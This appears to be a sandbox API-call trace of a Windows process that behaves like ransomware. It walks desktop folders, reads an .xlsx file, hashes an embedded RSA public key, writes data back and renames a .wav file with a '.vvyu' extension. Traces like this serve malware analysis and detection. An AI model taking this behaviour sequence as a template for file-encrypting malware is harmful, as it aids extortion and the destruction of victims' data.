[0200.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0200.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33b0 [0200.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3410 [0200.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0200.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3428 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33c8 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3398 [0200.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0200.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0200.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0200.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fb28 | out: hHeap=0x620000) returned 1 [0200.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.811] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xcb1b, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xcb1b, lpOverlapped=0x0) returned 1 [0200.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.812] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xcb20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.813] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.814] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.815] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.815] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.815] CloseHandle (hObject=0x510) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0200.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0200.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0200.817] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\RoOkllxYjwEwP5IM.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rookllxyjwewp5im.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\RoOkllxYjwEwP5IM.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rookllxyjwewp5im.wav.vvyu")) returned 1 [0200.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.819] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.821] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b6e8320, ftCreationTime.dwHighDateTime=0x1d89ebd, ftLastAccessTime.dwLowDateTime=0x905b3810, ftLastAccessTime.dwHighDateTime=0x1d89fd4, ftLastWriteTime.dwLowDateTime=0x905b3810, ftLastWriteTime.dwHighDateTime=0x1d89fd4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rQja5oZ7_uz", cAlternateFileName="RQJA5O~1")) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0200.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c36d40 [0200.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0200.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe1c0 | out: hHeap=0x620000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0200.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c36d40 | out: hHeap=0x620000) returned 1 [0200.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0200.823] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2d8890, ftCreationTime.dwHighDateTime=0x1d898b0, ftLastAccessTime.dwLowDateTime=0xc817e230, ftLastAccessTime.dwHighDateTime=0x1d899ad, ftLastWriteTime.dwLowDateTime=0xc817e230, ftLastWriteTime.dwHighDateTime=0x1d899ad, nFileSizeHigh=0x0, nFileSizeLow=0x526b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wa_4PK0L7JwGQV.xlsx", cAlternateFileName="WA_4PK~1.XLS")) returned 1 [0200.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.824] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\Wa_4PK0L7JwGQV.xlsx") returned=".xlsx" [0200.824] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\Wa_4PK0L7JwGQV.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\wa_4pk0l7jwgqv.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.825] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=21099) returned 1 [0200.825] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.828] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x5245, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.828] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.831] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.831] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x526b, lpOverlapped=0x0) returned 1 [0200.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.832] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0200.833] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.833] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.833] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.833] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.833] GetLastError () returned 0x0 [0200.833] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.833] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0200.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.834] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.834] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.834] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5270) returned 0x2ea99b0 [0200.834] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fb28 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fb70 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.835] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0200.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33c8 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea33b0 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 